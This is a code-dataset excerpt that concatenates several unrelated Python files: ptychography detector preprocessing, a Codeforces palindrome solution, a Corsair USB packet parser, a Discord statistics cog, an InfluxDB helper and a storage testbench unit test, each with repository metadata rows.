wf = [wfilename.format(wfilerange[0], i) for i in range(wn_acqs)]
elif self.pattern == 3:
wf = glob.glob(wfilename.split('}')[0]+'}*')
res = self.preprocess_data_stack(0, 1, wf, self.pattern, None, None, no_decorate=True)
self.data = res[1]
else: #Guesstimate the whitefield from the average of the diffraction patterns
pass
else:
self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
try:
probe = self.__class__.__all__['probe']
probe.data[0] = spf.ifft2(self.data[0]*exp(complex(0., 1.)*sp.angle(spf.fft2(probe.data[0]))))
CXP.log.info('Applied probe modulus constraint.')
except (AttributeError, KeyError):
pass
elif args[0] == 'dark':
if CXP.actions.preprocess_data:
# Get list of dark files
CXP.log.info('Preprocessing darkfield.')
dfilename, dfilerange, dn_acqs = [CXP.io.darkfield_filename, CXP.io.darkfield_filename_range,
CXP.measurement.n_acqs_darkfield]
self.pattern = dfilename.count('{')
if self.pattern == 1:
df = [dfilename.format(i) for i in range(dfilerange[0], dfilerange[1])]
elif self.pattern == 2:
df = [dfilename.format(dfilerange[0], i) for i in range(dn_acqs)]
elif self.pattern == 3:
df = glob.glob(dfilename.split('}')[0]+'}*')
res = self.preprocess_data_stack(0, 1, df, self.pattern, None, None, no_decorate=True)
self.data = res[1]
else:
self.load(CXData.raw_data_filename_string.format('probe_det_mod'))
def read_in_data(self):
self.completed_filenames = [] # Keep track of what's been processed already for online analysis
self.job_filenames = []
self.pattern = None
CXP.log.info('Reading in & preprocessing raw data...')
if self.pattern is None:
filename, filerange, n_acqs = [CXP.io.data_filename, CXP.io.data_filename_range, CXP.measurement.n_acqs_data]
self.pattern = filename.count('{')
CXP.log.info('Detected filename pattern: {:d}'.format(self.pattern))
if self.pattern == 0:
raise Exception('NamingConventionError:\nPlease read CXParams for more info on file naming conventions.')
try:
n0, n1 = filerange[0], filerange[1]+1
except IndexError:
n0 = n1 = filerange[0]
if CXP.io.darkfield_filename is not '':
try:
dark = self.__class__.__all__['dark']
CXP.log.info('Found darkfield.')
except KeyError:
dark = CXData(itype='dark')
dark.save()
else:
CXP.log.info('Not processing darkfields.')
dark = None
if CXP.io.whitefield_filename is not '':
try:
probe_det_mod = self.__class__.__all__['probe_det_mod']
CXP.log.info('Found probe detector modulus.')
except KeyError:
probe_det_mod = CXData(itype='probe_det_mod')
probe_det_mod.save()
else:
CXP.log.info('Not processing whitefields.')
probe_det_mod = None
old_verbosity = CXP.reconstruction.verbose
CXP.reconstruction.verbose = False
jobs = mp.JoinableQueue()
results = mp.Queue()
n_processes = mp.cpu_count()
then = time.time()
cnt=0
missing_frames = False
l=[]
CXP.log.info('Dividing raw data into jobs over {:d} processes.'.format(n_processes))
for i in range(n0, n1):
if self.pattern == 1:
s = [filename.format(i)]
else:
s = glob.glob((filename.split('}')[0]+'}*').format(i))
# s = [fn for fn in s if fn not in self.completed_filenames]
if len(s)==0:
CXP.log.error('Globbed 0 files in CXData@read_in_files')
sys.exit(1)
if self.pattern==1:
try:
s=s[0]
self.completed_filenames.append(s)
if cnt<n_acqs:
l.append(s)
cnt+=1
if cnt>=n_acqs:
self.job_filenames.append(l)
cnt=0
l=[]
except IndexError:
missing_frames = True
CXP.log.error('Missing frame: {:s}'.format(filename.format(i)))
else:
self.completed_filenames+=s
self.job_filenames.append(s)
if missing_frames:
print "There were missing frames. Choose 'c' to continue or 'q' to quit."
pdb.set_trace()
p = [mp.Process(target=self.preprocess_data_stack, args=(jobs, results))
for i in range(n_processes)]
for process in p:
process.start()
n_jobs = len(self.job_filenames)
for i in range(n_jobs):
jobs.put((i, n_jobs, self.job_filenames[i], self.pattern, probe_det_mod, dark))
# Add Poison Pill
for i in range(n_processes):
jobs.put((None, None, None, None, None, None))
CXP.log.info('{:3.2f} seconds elapsed dividing jobs between processes.'.format(time.time()-then))
then = time.time()
cnt = 0
self.data = [None]*n_jobs
while True:
if not results.empty():
i, data = results.get()
self.data[i] = data[0]
cnt+=1
elif cnt==n_jobs:
break
jobs.join()
jobs.close()
results.close()
for process in p:
process.join()
CXP.log.info('{:3.2f} seconds elapsed preprocessing data.'.format(time.time()-then))
CXP.reconstruction.verbose = old_verbosity
#self._sequence_dir = '/'.join([CXP.io.base_dir, CXP.io.scan_id, 'sequences'])
#self._cur_sequence_dir = self._sequence_dir+'/sequence_{:d}'.format(CXP.reconstruction.sequence)
#self.save(path=self._cur_sequence_dir+'/det_mod.npy')
@worker
def preprocess_data_stack(self, stack_num, n_jobs, file_list, pattern, white, dark):
# Average, merge and preprocess a stack of images
# Typically a stack corresponds to one ptychographic position
l=[]
tmp=None
# First - average according to the pattern
if pattern in [1, 2]:
# Averaging only
for filename in file_list:
if tmp is None:
tmp = self.openup(filename)
else:
tmp += self.openup(filename)
l.append(tmp/len(file_list))
elif pattern == 3:
# Average then merge
d={}
unique_times = list(set([t.split('_')[3] for t in file_list]))
for filename in file_list:
t = filename.split('.')[0].split('_')[-1]
if t not in d.keys():
d[t] = (1, self.openup(filename))
else:
d[t][0] += 1
d[t][1] += self.openup(filename)
for key, (i, val) in d.iteritems():
val /= i
# Check for saturated values and merge variable exposure times
max_time = max(unique_times)
if CXP.preprocessing.saturation_level>0:
for key in d.keys():
wh = sp.where(d[key]>=CXP.preprocessing.saturation_level)
d[key][wh] = 0
if tmp == 0:
tmp = d[key] * max_time/float(key)
else:
tmp += d[key] * max_time/float(key)
l.append(tmp)
else:
raise Exception('NamingConventionError')
# Do preprocessing
data = CXData()
data.data = l
if CXP.measurement.beam_stop:
data.treat_beamstop()
data.symmetrize_array_shape()
# CCD Specific Preprocessing
if CXP.preprocessing.detector_type == 'ccd':
try:
# Dark field correction
if dark is not None:
print('Dark field correcting data')
data-=dark
# Dark correct white field
if white is not None:
print('Dark field correcting whitefield')
white-=dark
except UnboundLocalError:
print('No darkfield subtraction performed.')
# PAD Specific Preprocessing
elif CXP.preprocessing.detector_type == 'pad':
pass
# Threshhold data
if CXP.preprocessing.threshhold_raw_data > 0:
data.threshhold()
if white is not None:
white.threshhold()
# Bin data
if CXP.preprocessing.bin > 1:
data.bin()
if white is not None:
white.bin()
if CXP.preprocessing.rot90!=0:
data.rot90(CXP.preprocessing.rot90)
if white is not None:
white.rot90(CXP.preprocessing.rot90)
# Take square root
data.square_root()
if white is not None:
white.square_root()
# Put in FFT shifted
data.fft_shift()
if white is not None:
white.fft_shift()
return (stack_num, data.data)
def bin(self, n=None):
"""
Bin a square array by grouping nxn pixels.
Array size must be a multiple of n.
"""
if n is None:
n=CXP.preprocessing.bin
# Now the detector pixel size has changed so we should update that
CXP.experiment.dx_d *= n
CXP.log.info('After binning new detector pixel size: {2.2e}'.format(CXP.experiment.dx_d))
nx, ny = self.data[0].shape[0], self.data[0].shape[1]
if not nx==ny:
raise Exception('Array to be binned must be square')
if not sp.mod(nx, n)==0.:
raise Exception('Array size must be a multiple of binning factor')
if n>nx:
raise Exception('Binning factor must be smaller than array size')
nn = nx/n
l = []
for i in xrange(len(self.data)):
tmp = sp.zeros((nn, nn))
for p in xrange(nn):
for q in xrange(nn):
tmp[p, q] = sp.sum(self.data[i][p*n:(p+1)*n, q*n:(q+1)*n])
l.append(tmp)
self.data=l
def show(self, i=0, phase=False, log=False):
if phase:
pylab.matshow(angle(self.data[i]), cmap=cm.hsv)
else:
if log:
pylab.matshow(sp.log10(abs(self.data[i])))
else:
pylab.matshow(abs(self.data[i]))
pylab.colorbar()
pylab.show()
def plot(self, i=0, phase=False):
pylab.figure()
if phase:
pylab.plot(np.angle(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.angle(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
else:
pylab.plot(np.abs(self.data[i][:, self.data[i].shape[0]/2]), label='Horizontal')
pylab.plot(np.abs(self.data[i][self.data[i].shape[1]/2, :]), label='Vertical')
pylab.legend()
def copy(self):
return CXData(data=[np.copy(arr) for arr in self.data])
class CXModal(object):
def __init__(self, *args, **kwargs):
self.modes = []
self.savepath = None
for kw in kwargs:
# Data attribute must be a list of arrays
if kw=='modes':
if isinstance(kwargs['modes'], list):
self.modes = kwargs['modes']
elif isinstance(kwargs['modes'], CXData):
self.modes = [kwargs['modes']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.modes[0].data[0])
except:
s=''
try:
return '<{} at {}>\n{:d} modes containing {:d} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.modes), len(self.modes[0]), self.modes[0].data[0].shape[0],
self.modes[0].data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo modes attribute present.'.format(self.__class__, hex(id(self)))
def __getitem__(self, s):
return self.modes[s]
def __setitem__(self, s, modes):
self.modes[s] = modes
@staticmethod
def _addsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.modes[mode].data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, CXData):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other.data[i]) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
elif isinstance(other, (int, float, complex)):
l=[]
for mode in xrange(len(this.modes)):
l.append(CXData(data=[operation(this.modes[mode].data[i], other) for i in range(len(this.modes[mode].data))]))
return CXModal(modes=l)
@staticmethod
def _iaddsubmuldiv(operation, this, other):
if isinstance(other, CXModal):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i]=operation(this.modes[mode].data[i], other.modes[mode].data[i])
return this
elif isinstance(other, CXData):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other.data[i])
return this
elif isinstance(other, (int, float, complex)):
for mode in xrange(len(this.modes)):
for i in range(len(this.modes[mode])):
this.modes[mode].data[i] = operation(this.modes[mode].data[i], other)
return this
def __add__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __radd__(self, other):
return CXModal._addsubmuldiv(operator.add, self, other)
def __iadd__(self, other):
return CXModal._iaddsubmuldiv(operator.iadd, self, other)
def __sub__(self, other):
return CXModal._addsubmuldiv(operator.sub, self, other)
def __rsub__(self, other):
return CXModal._addsubmuldiv(operator.sub, other, self)
def __isub__(self, other):
return CXModal._iaddsubmuldiv(operator.isub, self, other)
def __mul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __rmul__(self, other):
return CXModal._addsubmuldiv(operator.mul, self, other)
def __imul__(self, other):
return CXModal._addsubmuldiv(operator.imul, self, other)
def __div__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __rdiv__(self, other):
return CXModal._addsubmuldiv(operator.div, self, other)
def __idiv__(self, other):
return CXModal._addsubmuldiv(operator.idiv, self, other)
def __pow__(self, power):
return CXModal(modes=[self.modes[mode]**power for mode in range(len(self.modes))])
def __len__(self):
return len(self.modes)
def copy(self):
return CXModal(modes=[self.modes[mode].copy() for mode in range(len(self))])
@staticmethod
def modal_sum(modal):
return CXData(data=[ reduce(CXData.__add__, [ modal[mode][i] for mode in range(len(modal.modes)) ]).data[0] for i in range(len(modal[0].data))])
def getat(self, i):
"""
.. method::setat(self, i)
return all modes at position i
"""
return CXModal(modes=[self.modes[mode][i] for mode in range(len(self))])
def setat(self, i, modal):
"""
.. method::getat(self, i)
set all modes at position i
"""
for mode in range(len(self)):
self.modes[mode][i] = modal.modes[mode][0]
def normalise(self):
mode_sum_max = CXModal.modal_sum(abs(self)).data[0].max()
for mode in range(len(self)):
self.modes[mode] /= mode_sum_max
def orthogonalise(self):
ortho = CXModal(modes=self[0][0].copy())
for i in range(1, len(self)):
tmp = self[i][0].copy()
for j in range(i-1, -1, -1):
tmp -= CXData.proj_u_v(ortho[j][0], self[i][0])
ortho.modes.append(tmp)
return CXModal(modes=ortho.modes) | false | true |
f723238c03a819b00d08d86a7b7c1d5463e89447 | 1,238 | py | Python | O(n) on array/change_min.py | boristown/leetcode | 2e510b7913653da75cd9d10f1adce4c466e74768 | [
"MIT"
] | 1 | 2021-10-04T03:09:51.000Z | 2021-10-04T03:09:51.000Z | O(n) on array/change_min.py | boristown/leetcode | 2e510b7913653da75cd9d10f1adce4c466e74768 | [
"MIT"
] | null | null | null | O(n) on array/change_min.py | boristown/leetcode | 2e510b7913653da75cd9d10f1adce4c466e74768 | [
"MIT"
] | null | null | null | def change_min_palindrome(s,que):
'''
# 在区间内更改最少的元素,使得它不包含长度2以上的回文
# 输入包括一系列区间查询,输出变更区间的最小成本
# 字符串只含有a,b,c
#https://codeforces.com/problemset/problem/1555/D
#*1600
#输入:
s:字符串
que:查询序列,每个查询为(l,r)表示区间范围,坐标从1开始
#返回:
ans:每个查询的答案
'''
#分析
#由于不能包含长度2以上的回文,且只有三种字符
#推测可能只存在不超过10种合理的排列方式
#试着构造这样的排列:
#长度1:a / b / c
#长度2:ab / ac / ba / bc / ca / cb
#长度3:abc / acb / bac / bca / cab / cba
#长度4:abca / acba / bacb / bcab / cabc / cbac
#长度5:abcab / acbac / bacba / bcabc / cabca / cbacb
#可以看出对于大于1的每一种长度,都只存在6种合理的排列
#1 暴力解法:
# 对比区间与6种排列,分别计算成本
# 每次查询的时间复杂度为O(n)
# 总时间复杂度为O(m*n)
# 肯定超时
#2 前缀优化:
# 分别使用6种排列方式扫描原字符串
# 并使用前缀pre[k][i]记录第k种排列方式扫描到第i个字符时的成本
# 初始化时间复杂度:O(n)
# 每次查询的时间复杂度:O(1)
# 肯定通过
pat = ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
n = len(s)
pre = [[0]*(n+1) for _ in range(6)]
for k in range(6):
for i in range(n):
pre[k][i+1]=pre[k][i]
if s[i] != pat[k][i%3]:
pre[k][i+1]+=1
ans = []
for l,r in que:
a = float("inf")
for k in range(6):
a = min(a,pre[k][r]-pre[k][l-1])
ans.append(a)
return ans | 25.265306 | 54 | 0.518578 | def change_min_palindrome(s,que):
pat = ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
n = len(s)
pre = [[0]*(n+1) for _ in range(6)]
for k in range(6):
for i in range(n):
pre[k][i+1]=pre[k][i]
if s[i] != pat[k][i%3]:
pre[k][i+1]+=1
ans = []
for l,r in que:
a = float("inf")
for k in range(6):
a = min(a,pre[k][r]-pre[k][l-1])
ans.append(a)
return ans | true | true |
f723267e938751b84d6d2db92446189b8c043af8 | 2,178 | py | Python | 0e01.py | ZirconiumX/corsair-re | 9487fec931b262a013fb7fee3eaf90d6e67967ad | [
"MIT"
] | 7 | 2017-11-25T19:16:01.000Z | 2019-07-24T01:29:39.000Z | 0e01.py | Ravenslofty/corsair-re | 9487fec931b262a013fb7fee3eaf90d6e67967ad | [
"MIT"
] | 3 | 2018-02-07T07:13:21.000Z | 2019-06-25T20:35:45.000Z | 0e01.py | Ravenslofty/corsair-re | 9487fec931b262a013fb7fee3eaf90d6e67967ad | [
"MIT"
] | 2 | 2018-01-02T10:46:48.000Z | 2018-02-07T04:27:30.000Z | #!/usr/bin/python3
devices = {0x40: "K63",
0x17: "K65 RGB",
0x07: "K65",
0x37: "K65 LUX RGB",
0x39: "K65 RAPIDFIRE",
0x3f: "K68 RGB",
0x13: "K70 RGB",
0x09: "K70",
0x33: "K70 LUX RGB",
0x36: "K70 LUX",
0x48: "K70 RGB MK.2",
0x38: "K70 RAPIDFIRE RGB",
0x3a: "K70 RAPIDFIRE",
0x11: "K95 RGB",
0x08: "K95",
0x2d: "K95 PLATINUM RGB",
0x20: "STRAFE RGB",
0x49: "STRAFE RGB MK.2",
0x15: "STRAFE",
0x44: "STRAFE",
0x12: "M65 RGB",
0x2e: "M65 PRO RGB",
0x14: "SABRE RGB", # Optical
0x19: "SABRE RGB", # Laser
0x2f: "SABRE RGB", # New?
0x32: "SABRE RGB", # Alternate
0x1e: "SCIMITAR RGB",
0x3e: "SCIMITAR PRO RGB",
0x3c: "HARPOON RGB",
0x34: "GLAIVE RGB",
0x3d: "K55 RGB",
0x22: "KATAR",
0x3b: "MM800 RGB POLARIS",
0x2a: "VOID RGB"}
packet = [int("0x" + s, 16) for s in input().split(" ")]
if packet[0] != 0x0e or packet[1] != 0x01:
print("Not a valid init packet.")
exit(1)
# packet[2] and [3] are ignored
# packets 5 to 7 are unknown
print("Firmware: %d.%d%d" % (packet[9], (packet[8] & 0xF0) >> 4, (packet[8] & 0x0F)))
print("Bootloader: %d%d" % (packet[11], packet[10]))
print("Vendor: %x%x" % (packet[13], packet[12]))
print("Product: %x%x (%s)" % (packet[15], packet[14], devices[packet[14]]))
print("Poll rate: %dms" % (packet[16]))
# packets 17 to 19 are unknown
if packet[20] == 0xc0:
print("Type: Keyboard")
print("Layout: ", end='')
layouts = [
"ANSI",
"ISO",
"ABNT",
"JIS",
"Dubeolsik"
]
print(layouts[packet[23]])
elif packet[20] == 0xc1:
print("Type: Mouse")
print("Lighting zones: ", end='')
for i in range(8):
if (1 << i) & packet[24]:
print("%d " % i, end='')
print()
elif packet[20] == 0xc2:
print("Type: Mousepad")
else:
print("Type: Unknown")
| 26.560976 | 85 | 0.470615 |
devices = {0x40: "K63",
0x17: "K65 RGB",
0x07: "K65",
0x37: "K65 LUX RGB",
0x39: "K65 RAPIDFIRE",
0x3f: "K68 RGB",
0x13: "K70 RGB",
0x09: "K70",
0x33: "K70 LUX RGB",
0x36: "K70 LUX",
0x48: "K70 RGB MK.2",
0x38: "K70 RAPIDFIRE RGB",
0x3a: "K70 RAPIDFIRE",
0x11: "K95 RGB",
0x08: "K95",
0x2d: "K95 PLATINUM RGB",
0x20: "STRAFE RGB",
0x49: "STRAFE RGB MK.2",
0x15: "STRAFE",
0x44: "STRAFE",
0x12: "M65 RGB",
0x2e: "M65 PRO RGB",
0x14: "SABRE RGB",
0x19: "SABRE RGB",
0x2f: "SABRE RGB",
0x32: "SABRE RGB",
0x1e: "SCIMITAR RGB",
0x3e: "SCIMITAR PRO RGB",
0x3c: "HARPOON RGB",
0x34: "GLAIVE RGB",
0x3d: "K55 RGB",
0x22: "KATAR",
0x3b: "MM800 RGB POLARIS",
0x2a: "VOID RGB"}
packet = [int("0x" + s, 16) for s in input().split(" ")]
if packet[0] != 0x0e or packet[1] != 0x01:
print("Not a valid init packet.")
exit(1)
print("Firmware: %d.%d%d" % (packet[9], (packet[8] & 0xF0) >> 4, (packet[8] & 0x0F)))
print("Bootloader: %d%d" % (packet[11], packet[10]))
print("Vendor: %x%x" % (packet[13], packet[12]))
print("Product: %x%x (%s)" % (packet[15], packet[14], devices[packet[14]]))
print("Poll rate: %dms" % (packet[16]))
if packet[20] == 0xc0:
print("Type: Keyboard")
print("Layout: ", end='')
layouts = [
"ANSI",
"ISO",
"ABNT",
"JIS",
"Dubeolsik"
]
print(layouts[packet[23]])
elif packet[20] == 0xc1:
print("Type: Mouse")
print("Lighting zones: ", end='')
for i in range(8):
if (1 << i) & packet[24]:
print("%d " % i, end='')
print()
elif packet[20] == 0xc2:
print("Type: Mousepad")
else:
print("Type: Unknown")
| true | true |
f72328b4c20a9cd0d89dcd30e484ba7da76bb603 | 2,643 | py | Python | cogs/statistics.py | Tesshin/CS-Pound | 8e40f3a144aa6578e87d30aba0d43cb51756ecdf | [
"MIT"
] | null | null | null | cogs/statistics.py | Tesshin/CS-Pound | 8e40f3a144aa6578e87d30aba0d43cb51756ecdf | [
"MIT"
] | null | null | null | cogs/statistics.py | Tesshin/CS-Pound | 8e40f3a144aa6578e87d30aba0d43cb51756ecdf | [
"MIT"
] | null | null | null | from datetime import datetime
import os
import platform
import sys
import time
import discord
from discord.ext import commands
import psutil
from constants import Constants
from library import resolver
start_time = datetime.now() # The time the script started running
class Statistics(commands.Cog):
    """Cog exposing runtime statistics about the bot and its host."""

    def __init__(self, bot):
        # Keep a handle on the running bot so the command can query it.
        self.bot = bot

    @commands.command(aliases=["stats"])
    @commands.guild_only()
    async def statistics(self, ctx):
        """Reply with an embed summarising bot, process and host statistics."""
        # Guard clause: only respond when no subcommand was invoked.
        if ctx.invoked_subcommand is not None:
            return

        # Host / process figures (gathered via psutil).
        operating_system = f"{platform.system()}"
        cpu_percent = f"{psutil.cpu_percent()}%"
        memory_percent = f"{psutil.virtual_memory().percent}%"
        bot_memory = (
            f"{round(psutil.Process(os.getpid()).memory_info().rss / 1024**2)} MB"
        )
        # Host uptime, formatted by the project's resolver() helper.
        system_uptime = resolver(
            round(time.time() - psutil.boot_time())
        )

        # Bot / library figures.
        bot_id = self.bot.user.id
        guild_count = f"{len(self.bot.guilds)} guilds"
        cogs_loaded = f"{len(self.bot.cogs)} commands loaded"
        ping = f"{round(self.bot.latency * 1000)}ms"
        python_version = f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}"
        discord_py_version = f"{discord.__version__}"
        bot_version = f"{Constants.version}"
        # Time the bot script has been running (module-level start_time).
        bot_uptime = resolver(
            (datetime.now() - start_time).total_seconds()
        )

        description = f"""`Created by Haru#5616. CS: haruyuki`
**Owner ID:** `{Constants.owner_id}`
**CS-Pound ID:** `{bot_id}`
**Running on:** `{guild_count}`
**OS:** `{operating_system}`
**Commands:** `{cogs_loaded}`
**Ping:** `{ping}`
**Python version:** `{python_version}`
**discord.py version:** `{discord_py_version}`
**CS-Pound version:** `{bot_version}`
**CPU usage:** `{cpu_percent}`
**Memory usage:** `{memory_percent}`
**CS-Pound memory usage:** `{bot_memory}`
**CS-Pound uptime:** `{bot_uptime}`
**System uptime:** `{system_uptime}`"""

        # Build the reply embed: one field carrying the whole stats block.
        embed = discord.Embed(
            colour=0x4BA139, timestamp=datetime.utcnow()
        )
        embed.set_thumbnail(
            url="https://www.chickensmoothie.com/Forum/images/avatars/gallery/Bunnies/0001-1.png"
        )
        embed.set_footer(text="Requested")
        embed.add_field(name="CS-Pound Stats", value=description)
        await ctx.send(embed=embed)
def setup(bot):
    # Entry point used by discord.py's extension loader
    # (bot.load_extension): registers this cog on the bot.
    bot.add_cog(Statistics(bot))
| 31.843373 | 106 | 0.611805 | from datetime import datetime
import os
import platform
import sys
import time
import discord
from discord.ext import commands
import psutil
from constants import Constants
from library import resolver
start_time = datetime.now()
class Statistics(commands.Cog):
    """Cog that reports runtime statistics about the bot and its host."""

    def __init__(self, bot):
        # Keep a handle on the running bot so the command can query it.
        self.bot = bot

    @commands.command(aliases=["stats"])
    @commands.guild_only()
    async def statistics(self, ctx):
        """Reply with an embed summarising bot, process and host statistics."""
        # NOTE(review): `statistics` is registered as a plain Command, so
        # `invoked_subcommand` is presumably always None here — confirm.
        if ctx.invoked_subcommand is None:
            bot_id = self.bot.user.id
            # Interpreter / library versions.
            python_version = f"{sys.version_info.major}.{sys.version_info.minor}.{sys.version_info.micro}"
            discord_py_version = f"{discord.__version__}"
            bot_version = f"{Constants.version}"
            operating_system = f"{platform.system()}"
            bot_id = self.bot.user.id
            guild_count = f"{len(self.bot.guilds)} guilds"
            # Host / process figures gathered via psutil.
            cpu_percent = f"{psutil.cpu_percent()}%"
            memory_percent = f"{psutil.virtual_memory().percent}%"
            bot_memory = (
                f"{round(psutil.Process(os.getpid()).memory_info().rss / 1024**2)} MB"
            )
            cogs_loaded = f"{len(self.bot.cogs)} commands loaded"
            ping = f"{round(self.bot.latency * 1000)}ms"
            # Time the bot (script) has been running, formatted by resolver().
            bot_uptime = resolver(
                (datetime.now() - start_time).total_seconds()
            )
            # Time the host system has been running.
            system_uptime = resolver(
                round(time.time() - psutil.boot_time())
            )
            description = f"""`Created by Haru#5616. CS: haruyuki`
**Owner ID:** `{Constants.owner_id}`
**CS-Pound ID:** `{bot_id}`
**Running on:** `{guild_count}`
**OS:** `{operating_system}`
**Commands:** `{cogs_loaded}`
**Ping:** `{ping}`
**Python version:** `{python_version}`
**discord.py version:** `{discord_py_version}`
**CS-Pound version:** `{bot_version}`
**CPU usage:** `{cpu_percent}`
**Memory usage:** `{memory_percent}`
**CS-Pound memory usage:** `{bot_memory}`
**CS-Pound uptime:** `{bot_uptime}`
**System uptime:** `{system_uptime}`"""
            # Create an empty embed; all stats go into a single field below.
            embed = discord.Embed(
                colour=0x4BA139, timestamp=datetime.utcnow()
            )
            embed.set_footer(text="Requested")
            embed.set_thumbnail(
                url="https://www.chickensmoothie.com/Forum/images/avatars/gallery/Bunnies/0001-1.png"
            )
            embed.add_field(name="CS-Pound Stats", value=description)
            await ctx.send(embed=embed)  # Send embed
        else:
            pass
def setup(bot):
    # Entry point used by discord.py's extension loader
    # (bot.load_extension): registers this cog on the bot.
    bot.add_cog(Statistics(bot))
| true | true |
f7232a5787dd822b8c3d68e006678d905ccc32d0 | 703 | py | Python | Configuration/influx.py | marcosmarcon/Oracle-and-Grafana-integration | 0a7f47a940a72b281a9ff04285c222be99516829 | [
"MIT",
"Unlicense"
] | 1 | 2020-10-09T18:02:11.000Z | 2020-10-09T18:02:11.000Z | Configuration/influx.py | marcosmarcon/Oracle-and-Grafana-integration | 0a7f47a940a72b281a9ff04285c222be99516829 | [
"MIT",
"Unlicense"
] | null | null | null | Configuration/influx.py | marcosmarcon/Oracle-and-Grafana-integration | 0a7f47a940a72b281a9ff04285c222be99516829 | [
"MIT",
"Unlicense"
] | null | null | null | from influxdb import InfluxDBClient
class InfluxConnection:
    """Thin wrapper around ``InfluxDBClient`` that batches points before writing.

    Note: the former class-level ``points = []`` attribute was removed — it
    was a shared mutable class attribute, always shadowed by the instance
    attribute assigned in ``__init__``.
    """

    def __init__(self):
        # Per-instance batch of points waiting to be flushed.
        self.points = []
        # Connection settings (placeholders — replace with real credentials).
        self.host = "host"
        self.port = "port"
        self.username = "user"
        self.password = "pass"
        self.database = "base"
        self.client = InfluxDBClient(self.host, self.port, self.username,
                                     self.password, self.database)

    def drop_current_measurement(self, measurement):
        """Drop *measurement* entirely from the current database.

        The identifier is double-quoted per InfluxQL syntax so names with
        spaces or special characters work, and embedded double quotes are
        escaped so the name cannot break out of the identifier. (The old
        code's adjacent string literals collapsed to an unquoted
        ``DROP MEASUREMENT <name>``.)
        """
        quoted = measurement.replace('"', '\\"')
        self.client.query('DROP MEASUREMENT "{}"'.format(quoted))

    def append_point(self, point):
        """Queue a single point dict for the next ``write_points()`` call."""
        self.points.append(point)

    def write_points(self):
        """Flush all queued points to InfluxDB (the queue is not cleared)."""
        self.client.write_points(self.points)

    def clean_points(self):
        """Discard all queued points without writing them."""
        self.points = []
class InfluxConnection:
points = []
def __init__(self):
self.points = []
self.host = "host"
self.port = "port"
self.username = "user"
self.password = "pass"
self.database = "base"
self.client = InfluxDBClient(self.host, self.port, self.username, self.password, self.database)
def drop_current_measurement(self, measurement):
self.client.query("DROP MEASUREMENT """ + measurement + """""")
def append_point(self, point):
self.points.append(point)
def write_points(self):
self.client.write_points(self.points)
def clean_points(self):
self.points = [] | true | true |
f7232b19d0c443e84587644f5b373ca332373ac3 | 10,409 | py | Python | tests/test_testbench_object_special.py | noahdietz/storage-testbench | b122e47b69cabcdf981969068df0e9d805f129a3 | [
"Apache-2.0"
] | 4 | 2021-08-20T12:27:11.000Z | 2022-01-24T12:20:19.000Z | tests/test_testbench_object_special.py | noahdietz/storage-testbench | b122e47b69cabcdf981969068df0e9d805f129a3 | [
"Apache-2.0"
] | 260 | 2021-06-29T00:50:44.000Z | 2022-03-30T12:25:26.000Z | tests/test_testbench_object_special.py | noahdietz/storage-testbench | b122e47b69cabcdf981969068df0e9d805f129a3 | [
"Apache-2.0"
] | 11 | 2021-06-14T16:25:31.000Z | 2022-03-22T19:42:49.000Z | #!/usr/bin/env python3
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit test for special object operations in the testbench."""
import json
import os
import unittest
from testbench import rest_server
class TestTestbenchObjectSpecial(unittest.TestCase):
    """Tests for the testbench's special object operations.

    Covers compose, copy (with and without metadata patches) and chunked
    rewrite, exercising both the JSON and XML surfaces of the emulated
    GCS server.
    """

    def setUp(self):
        """Reset the in-memory database and build a fresh test client."""
        rest_server.db.clear()
        self.client = rest_server.server.test_client()
        # Avoid magic buckets in the test
        os.environ.pop("GOOGLE_CLOUD_CPP_STORAGE_TEST_BUCKET_NAME", None)

    def test_object_compose(self):
        """Composing two objects concatenates their payloads in order."""
        response = self.client.post(
            "/storage/v1/b", data=json.dumps({"name": "bucket-name"})
        )
        self.assertEqual(response.status_code, 200)
        payloads = {
            "fox": "The quick brown fox jumps over the lazy dog\n",
            "zebra": "How vexingly quick daft zebras jump!\n",
        }
        sources = []
        for object_name, payload in payloads.items():
            # Use the XML API to insert an object, as the JSON API is not yet ready.
            response = self.client.put(
                "/bucket-name/" + object_name,
                content_type="text/plain",
                data=payload,
            )
            self.assertEqual(response.status_code, 200)
            # Get the metadata so we can include the generation precondition
            # in the compose request.
            response = self.client.get("/storage/v1/b/bucket-name/o/" + object_name)
            self.assertEqual(response.status_code, 200)
            o = json.loads(response.data)
            sources.append(
                {
                    "name": object_name,
                    "generation": o.get("generation"),
                    "objectPreconditions": {"ifGenerationMatch": o.get("generation")},
                }
            )
        response = self.client.post(
            "/storage/v1/b/bucket-name/o/both/compose",
            data=json.dumps({"sourceObjects": sources}),
        )
        self.assertEqual(response.status_code, 200, msg=response.data)
        self.assertTrue(
            response.headers.get("content-type").startswith("application/json")
        )
        compose_rest = json.loads(response.data)
        # Compose returns the full projection; drop acl/owner so the result
